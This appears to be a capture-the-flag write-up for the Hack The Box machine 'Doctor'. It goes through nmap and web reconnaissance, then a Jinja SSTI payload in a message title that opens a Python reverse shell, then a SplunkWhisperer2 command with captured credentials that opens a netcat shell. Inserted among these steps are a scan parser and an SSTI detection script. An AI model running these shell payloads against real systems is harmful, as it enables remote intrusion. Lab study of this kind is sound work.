nmap -A -p- -oA output 10.129.2.21 --min-rate=10000 --script=vuln --script-timeout=15 -v

Pasted image 20210830150902.png

nmap -sC -sV -O -p- -oA doctor 10.129.2.21

nmap -sU -O -p- -oA doctor-udp 10.129.2.21
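Because both full scans above are saved with -oA, nmap also writes a greppable .gnmap file next to the .nmap and .xml output. The parser below is an added example (not from the original notes) that turns that file into structured port records so the exposed services can be triaged or diffed against a later scan; the sample .gnmap text and the banners in it are constructed for the example and are not the results of the scan above.

```python
import re
from typing import Dict, List

# A .gnmap file as written by `nmap ... -oA doctor`. Constructed sample: the
# ports, banners and OS guess are illustrative, not the real scan output.
SAMPLE_GNMAP = (
    "# Nmap 7.91 scan initiated as: nmap -sC -sV -O -p- -oA doctor 10.129.2.21\n"
    "Host: 10.129.2.21 ()\tStatus: Up\n"
    "Host: 10.129.2.21 ()\tPorts: 22/open/tcp//ssh//OpenSSH 8.2p1 Ubuntu/, "
    "80/open/tcp//http//Apache httpd 2.4.41/, "
    "8089/open/tcp//ssl|http//Splunkd httpd/\t"
    "Ignored State: closed (65532)\tOS: Linux 4.15 - 5.6\n"
    "# Nmap done -- 1 IP address (1 host up) scanned\n"
)


def parse_gnmap(text: str) -> Dict[str, List[dict]]:
    """Map each scanned host to its port records.

    Each record has port, state, proto, service and version. Fields in a
    .gnmap line are tab separated; the Ports field holds comma-separated
    entries laid out as port/state/proto/owner/service/rpc/version/.
    """
    hosts: Dict[str, List[dict]] = {}
    for line in text.splitlines():
        if not line.startswith("Host: "):
            continue  # comment lines and blank lines
        fields = line.split("\t")
        host = fields[0].split()[1]
        hosts.setdefault(host, [])
        for field in fields[1:]:
            if not field.startswith("Ports: "):
                continue  # Status:, Ignored State:, OS: etc.
            for entry in field[len("Ports: "):].split(", "):
                # maxsplit=6 keeps any '/' inside the version banner intact
                port, state, proto, _owner, service, _rpc, version = entry.split("/", 6)
                hosts[host].append({
                    "port": int(port),
                    "state": state,
                    "proto": proto,
                    "service": service,
                    "version": version.rstrip("/"),
                })
    return hosts


def open_ports(hosts: Dict[str, List[dict]], host: str) -> List[int]:
    """Return the open port numbers recorded for one host."""
    return [p["port"] for p in hosts.get(host, []) if p["state"] == "open"]


if __name__ == "__main__":
    parsed = parse_gnmap(SAMPLE_GNMAP)
    for host, ports in parsed.items():
        print(host, open_ports(parsed, host))
        for p in ports:
            print(f"  {p['port']}/{p['proto']} {p['service']:<10} {p['version']}")
```

Saving the parsed records after each scan and diffing them is a cheap way to notice when a management service such as the Splunk daemon on 8089 becomes reachable from outside.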

nikto -h 10.129.2.21:80

Pasted image 20210830151046.png

whatweb 10.129.2.21

Pasted image 20210830151615.png

http://10.129.2.21

Pasted image 20210830151813.png

http://doctors.htb

We can see that it is a Flask/Python application.

Pasted image 20210830152341.png

curl -s -X GET "http://doctors.htb/login?next=%2F" -I

Pasted image 20210830152542.png

We register a user.

Pasted image 20210830152912.png

We see that an SSTI is possible.

Pasted image 20210830154323.png

https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection

Exploit the SSTI by calling Popen without guessing the offset

We go to New Message and put the following in the title:

{% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen("python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.10.14.125\",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/bash\", \"-i\"]);'").read().zfill(417)}}{%endif%}{% endfor %}

We then refresh:

http://doctors.htb/archive
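The title field is rendered as template source, which is why the Jinja delimiters and the __class__/__subclasses__ walk in the payload above get evaluated instead of displayed. The code below is an added example (not part of the original notes) showing how a defender can detect that probing: one function scores a decoded value for SSTI indicators, and a second one runs it over constructed Werkzeug-style access log lines. The log lines, paths and timestamps are made up for the example; nothing here comes from the box.

```python
import re
from typing import List, Tuple
from urllib.parse import unquote_plus

# Indicators of template-syntax probing and of the gadget chain used by the
# payload above: Jinja delimiters, dunder attribute walking and OS access.
# Dict order matters: it is the order in which indicator names are reported.
SSTI_INDICATORS = {
    "jinja_expression": re.compile(r"\{\{.*?\}\}", re.S),
    "jinja_statement": re.compile(r"\{%.*?%\}", re.S),
    "dunder_walk": re.compile(r"__(class|base|mro|subclasses|globals|builtins|import)__"),
    "os_exec": re.compile(r"\b(popen|system|subprocess)\b"),
}


def find_ssti_indicators(value: str) -> List[str]:
    """Return the names of all SSTI indicators present in a URL-decoded value.

    Works on a query string, a form field or a header value alike, so an
    application can call it on the message title before storing it.
    """
    decoded = unquote_plus(value)
    return [name for name, rx in SSTI_INDICATORS.items() if rx.search(decoded)]


# Werkzeug/Flask-style access log lines, constructed for this example.
SAMPLE_LOG = """\
10.10.14.125 - - [30/Aug/2021 15:29:12] "GET /login?next=%2F HTTP/1.1" 200 -
10.10.14.125 - - [30/Aug/2021 15:43:01] "POST /post/new HTTP/1.1" 302 -
10.10.14.125 - - [30/Aug/2021 15:43:02] "GET /archive HTTP/1.1" 200 -
10.10.14.125 - - [30/Aug/2021 15:50:40] "GET /search?q=%7B%7B7*7%7D%7D HTTP/1.1" 200 -
10.10.14.125 - - [30/Aug/2021 15:51:03] "GET /search?q=%7B%25+for+x+in+().__class__.__base__.__subclasses__()+%25%7D HTTP/1.1" 200 -
"""

REQUEST_RX = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/')


def scan_access_log(text: str) -> List[Tuple[int, str, List[str]]]:
    """Flag log lines whose request target contains SSTI indicators.

    Returns (1-based line number, decoded request target, indicator names).
    Only the request line is inspected: a POST body such as the message
    title never appears in an access log, so the POST /post/new line above
    is not flagged even though that is where the real payload travelled.
    """
    hits = []
    for n, line in enumerate(text.splitlines(), start=1):
        m = REQUEST_RX.search(line)
        if not m:
            continue
        names = find_ssti_indicators(m.group("target"))
        if names:
            hits.append((n, unquote_plus(m.group("target")), names))
    return hits


if __name__ == "__main__":
    for n, target, names in scan_access_log(SAMPLE_LOG):
        print(f"line {n}: {names} in {target}")
```

The access-log scan catches probes sent in the query string, but the injection on this box goes through a form field in a POST body, which is why the application itself should run find_ssti_indicators on stored fields (or log them) rather than relying on the web server log alone. The underlying fix is to render user input as a template variable instead of as template source.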

git clone https://github.com/cnotin/SplunkWhisperer2

Pasted image 20210830161120.png

python3 PySplunkWhisperer2_remote.py --host 10.129.2.21 --lhost 10.10.14.125 --username shaun --password Guitar123 --payload "nc.traditional -e /bin/bash 10.10.14.125"

Pasted image 20210830161536.png

nc -lvnp 443

Pasted image 20210830162359.png


Copyright © 2022 Cu3rv0x. All rights reserved.